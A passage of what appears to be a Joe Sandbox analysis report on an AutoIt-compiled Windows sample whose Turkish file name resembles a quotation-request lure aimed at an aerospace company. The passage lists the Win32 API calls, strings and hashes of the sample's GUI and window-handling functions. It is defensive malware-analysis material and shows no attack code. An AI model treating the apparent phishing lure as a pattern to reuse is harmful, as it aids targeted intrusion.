                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1996641542-0
                                                                                                                                    • Opcode ID: 78f0305c9340b35cbe30863df2ad695c36f55c3860c09b83122a85797b8134c9
                                                                                                                                    • Instruction ID: 508c0c2cb1d96e65a92983cc133951027ff5f25cb16d2b18b99d829abaeb8d82
                                                                                                                                    • Opcode Fuzzy Hash: 78f0305c9340b35cbe30863df2ad695c36f55c3860c09b83122a85797b8134c9
                                                                                                                                    • Instruction Fuzzy Hash: 9E518E71900219FFDB219FA4DC48EAE7BB9FF08360F214255FA51AB295C77A9940CF50
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 01028AC1
                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01028AD2
                                                                                                                                    • CharNextW.USER32(0000014E), ref: 01028B01
                                                                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01028B42
                                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01028B58
                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01028B69
                                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 01028B86
                                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 01028BD8
                                                                                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 01028BEE
                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 01028C1F
                                                                                                                                    • _memset.LIBCMT ref: 01028C44
                                                                                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 01028C8D
                                                                                                                                    • _memset.LIBCMT ref: 01028CEC
                                                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 01028D16
                                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 01028D6E
                                                                                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 01028E1B
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 01028E3D
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01028E87
                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01028EB4
                                                                                                                                    • DrawMenuBar.USER32(?), ref: 01028EC3
                                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 01028EEB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 1073566785-4108050209
                                                                                                                                    • Opcode ID: f3c7ec7154795dc4a1c94bb4734c95080c75c50664b77c646ffe24668af3c169
                                                                                                                                    • Instruction ID: 19bf7332b0a513839897bd9dd29cee1c497136eae1b231340ff98102ea00f29b
                                                                                                                                    • Opcode Fuzzy Hash: f3c7ec7154795dc4a1c94bb4734c95080c75c50664b77c646ffe24668af3c169
                                                                                                                                    • Instruction Fuzzy Hash: 1AE1C274900229AFEF609F64CC84EEE7BF9EF08750F10819AFA95AB191DB748584CF50
                                                                                                                                    APIs
                                                                                                                                    • GetCursorPos.USER32(?), ref: 010249CA
                                                                                                                                    • GetDesktopWindow.USER32 ref: 010249DF
                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 010249E6
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 01024A48
                                                                                                                                    • DestroyWindow.USER32(?), ref: 01024A74
                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 01024A9D
                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01024ABB
                                                                                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 01024AE1
                                                                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 01024AF6
                                                                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01024B09
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 01024B29
                                                                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01024B44
                                                                                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01024B58
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 01024B70
                                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 01024B96
                                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 01024BB0
                                                                                                                                    • CopyRect.USER32(?,?), ref: 01024BC7
                                                                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 01024C32
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                                                    • API String ID: 698492251-4156429822
                                                                                                                                    • Opcode ID: 06e553bd8d9aa1a5f16c046b5de1ea0c7a38331c628b926e1d98f439314b4fad
                                                                                                                                    • Instruction ID: e112900584e1e8d54598f36910ef1a78a4725ce1726e8229aa915d8461d6acff
                                                                                                                                    • Opcode Fuzzy Hash: 06e553bd8d9aa1a5f16c046b5de1ea0c7a38331c628b926e1d98f439314b4fad
                                                                                                                                    • Instruction Fuzzy Hash: 19B1A970608351AFDB54DF68C888B6ABBE4FF89310F008A1CF9D99B291D775E805CB95
                                                                                                                                    APIs
                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 010044AC
                                                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 010044D2
                                                                                                                                    • _wcscpy.LIBCMT ref: 01004500
                                                                                                                                    • _wcscmp.LIBCMT ref: 0100450B
                                                                                                                                    • _wcscat.LIBCMT ref: 01004521
                                                                                                                                    • _wcsstr.LIBCMT ref: 0100452C
                                                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 01004548
                                                                                                                                    • _wcscat.LIBCMT ref: 01004591
                                                                                                                                    • _wcscat.LIBCMT ref: 01004598
                                                                                                                                    • _wcsncpy.LIBCMT ref: 010045C3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                    • API String ID: 699586101-1459072770
                                                                                                                                    • Opcode ID: 1398c7e66f9e829a5746907df8e88d0443689f940e68ff53fc28750835dc0d44
                                                                                                                                    • Instruction ID: c41b25f83a64257a76bd3c2a1e7819175bfb5f0ae39f4196262be43704a11a5b
                                                                                                                                    • Opcode Fuzzy Hash: 1398c7e66f9e829a5746907df8e88d0443689f940e68ff53fc28750835dc0d44
                                                                                                                                    • Instruction Fuzzy Hash: 3F412871940202BAEB11AA75CD03FBF77BCDF45750F04445EFA41E6182EF39AA01A6A9
                                                                                                                                    APIs
                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FA28BC
                                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00FA28C4
                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FA28EF
                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00FA28F7
                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00FA291C
                                                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FA2939
                                                                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00FA2949
                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FA297C
                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FA2990
                                                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00FA29AE
                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00FA29CA
                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA29D5
                                                                                                                                      • Part of subcall function 00FA2344: GetCursorPos.USER32(?), ref: 00FA2357
                                                                                                                                      • Part of subcall function 00FA2344: ScreenToClient.USER32(010657B0,?), ref: 00FA2374
                                                                                                                                      • Part of subcall function 00FA2344: GetAsyncKeyState.USER32(00000001), ref: 00FA2399
                                                                                                                                      • Part of subcall function 00FA2344: GetAsyncKeyState.USER32(00000002), ref: 00FA23A7
                                                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,00FA1256), ref: 00FA29FC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                                                    • API String ID: 1458621304-248962490
                                                                                                                                    • Opcode ID: 3fb88579afb83c65c6d4e0023a3434cac66463c7076f0d0b9e446334f7253e0a
                                                                                                                                    • Instruction ID: 844bb4d1f33365299abaa2bf2cff98980047e73a52773a858566ca88371e1f4d
                                                                                                                                    • Opcode Fuzzy Hash: 3fb88579afb83c65c6d4e0023a3434cac66463c7076f0d0b9e446334f7253e0a
                                                                                                                                    • Instruction Fuzzy Hash: 32B19F71A0020AEFDB24DFA8DC45BAE7BB5FB08350F10422AFA55E7294DB79D841DB50
                                                                                                                                    APIs
                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00FFA47A
                                                                                                                                    • __swprintf.LIBCMT ref: 00FFA51B
                                                                                                                                    • _wcscmp.LIBCMT ref: 00FFA52E
                                                                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00FFA583
                                                                                                                                    • _wcscmp.LIBCMT ref: 00FFA5BF
                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00FFA5F6
                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00FFA648
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00FFA67E
                                                                                                                                    • GetParent.USER32(?), ref: 00FFA69C
                                                                                                                                    • ScreenToClient.USER32(00000000), ref: 00FFA6A3
                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00FFA71D
                                                                                                                                    • _wcscmp.LIBCMT ref: 00FFA731
                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00FFA757
                                                                                                                                    • _wcscmp.LIBCMT ref: 00FFA76B
                                                                                                                                      • Part of subcall function 00FC362C: _iswctype.LIBCMT ref: 00FC3634
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                                    • String ID: %s%u
                                                                                                                                    • API String ID: 3744389584-679674701
                                                                                                                                    • Opcode ID: 52fa2ac9b81ce8be7387d1b4b40a9f41c3689810078a706af5a0c70ee76b8832
                                                                                                                                    • Instruction ID: 334840f84904656b8323df249f60a2a5fa7110335cbb34aa756d06357b343ec6
                                                                                                                                    • Opcode Fuzzy Hash: 52fa2ac9b81ce8be7387d1b4b40a9f41c3689810078a706af5a0c70ee76b8832
                                                                                                                                    • Instruction Fuzzy Hash: 14A1D3B260430BABD714EF60C884FBAB7E8FF44354F148519EA9DD2160DB34E945DB92
                                                                                                                                    APIs
                                                                                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 00FFAF18
                                                                                                                                    • _wcscmp.LIBCMT ref: 00FFAF29
                                                                                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 00FFAF51
                                                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00FFAF6E
                                                                                                                                    • _wcscmp.LIBCMT ref: 00FFAF8C
                                                                                                                                    • _wcsstr.LIBCMT ref: 00FFAF9D
                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00FFAFD5
                                                                                                                                    • _wcscmp.LIBCMT ref: 00FFAFE5
                                                                                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 00FFB00C
                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00FFB055
                                                                                                                                    • _wcscmp.LIBCMT ref: 00FFB065
                                                                                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 00FFB08D
                                                                                                                                    • GetWindowRect.USER32(00000004,?), ref: 00FFB0F6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                    • String ID: @$ThumbnailClass
                                                                                                                                    • API String ID: 1788623398-1539354611
                                                                                                                                    • Opcode ID: 06b6c0cc6f177da2ae4b301239a17c9133e7bf4f2e07b8a2acb20cdc39cd185f
                                                                                                                                    • Instruction ID: 6cf4e9a3cc198a3ad7b8629fa11373839c71db32af288262981aff68e5582b20
                                                                                                                                    • Opcode Fuzzy Hash: 06b6c0cc6f177da2ae4b301239a17c9133e7bf4f2e07b8a2acb20cdc39cd185f
                                                                                                                                    • Instruction Fuzzy Hash: 1881C1B140830A9BDB14DF10C885FBA77E8EF44764F148469FE898A0A5DB34DD49EB61
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wcsnicmp
                                                                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                    • API String ID: 1038674560-1810252412
                                                                                                                                    • Opcode ID: 5c6d49f246ff18497b83bf369e41f092fcce9be400f3167ffb00859e5aa14c12
                                                                                                                                    • Instruction ID: ea5ce1e509f04e586d2a5867b075fbfb7dd4380f7a6b792a2c81cb1d61841b3b
                                                                                                                                    • Opcode Fuzzy Hash: 5c6d49f246ff18497b83bf369e41f092fcce9be400f3167ffb00859e5aa14c12
                                                                                                                                    • Instruction Fuzzy Hash: 2E31B0B1A44209A6DB14FBA1DE43FBF77A4AF10760FA0001CB945750A5EB55AF04F652
                                                                                                                                    APIs
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 01015013
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0101501E
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 01015029
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 01015034
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 0101503F
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 0101504A
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 01015055
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 01015060
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 0101506B
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 01015076
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 01015081
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0101508C
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 01015097
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 010150A2
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 010150AD
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 010150B8
                                                                                                                                    • GetCursorInfo.USER32(?), ref: 010150C8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Cursor$Load$Info
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2577412497-0
                                                                                                                                    • Opcode ID: 94ad3259e1a5960903b6722f96a6369b9a079f3dab330a53e98b264e025c61f4
                                                                                                                                    • Instruction ID: 951fc081ab20b3c37b8779f8a312764ae4b813816e1a4847adb432471f87efd9
                                                                                                                                    • Opcode Fuzzy Hash: 94ad3259e1a5960903b6722f96a6369b9a079f3dab330a53e98b264e025c61f4
                                                                                                                                    • Instruction Fuzzy Hash: 393115B1D0831A6ADF609FBA8C8985EBFF8FF04750F50452AE54CEB280DA7C65008F91
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 0102A259
                                                                                                                                    • DestroyWindow.USER32(?,?), ref: 0102A2D3
                                                                                                                                      • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0102A34D
                                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0102A36F
                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0102A382
                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 0102A3A4
                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FA0000,00000000), ref: 0102A3DB
                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0102A3F4
                                                                                                                                    • GetDesktopWindow.USER32 ref: 0102A40D
                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0102A414
                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0102A42C
                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0102A444
                                                                                                                                      • Part of subcall function 00FA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FA25EC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                                    • API String ID: 1297703922-3619404913
                                                                                                                                    • Opcode ID: e75d99244ff5132b43fed6b3a19ff8a17432e76481b61141b629ddef1484b5cf
                                                                                                                                    • Instruction ID: 6c49d2afdca8d2be619a202bdf88c52bdc4ba47e8a2fa490ef89000a1056db08
                                                                                                                                    • Opcode Fuzzy Hash: e75d99244ff5132b43fed6b3a19ff8a17432e76481b61141b629ddef1484b5cf
                                                                                                                                    • Instruction Fuzzy Hash: E6719A75240205AFE721CF28CC49F6A7BE5FB89740F04455CFAC5976A0CB79E906CB62
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 0102C627
                                                                                                                                      • Part of subcall function 0102AB37: ClientToScreen.USER32(?,?), ref: 0102AB60
                                                                                                                                      • Part of subcall function 0102AB37: GetWindowRect.USER32(?,?), ref: 0102ABD6
                                                                                                                                      • Part of subcall function 0102AB37: PtInRect.USER32(?,?,0102C014), ref: 0102ABE6
                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0102C690
                                                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0102C69B
                                                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0102C6BE
                                                                                                                                    • _wcscat.LIBCMT ref: 0102C6EE
                                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0102C705
                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0102C71E
                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0102C735
                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0102C757
                                                                                                                                    • DragFinish.SHELL32(?), ref: 0102C75E
                                                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0102C851
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
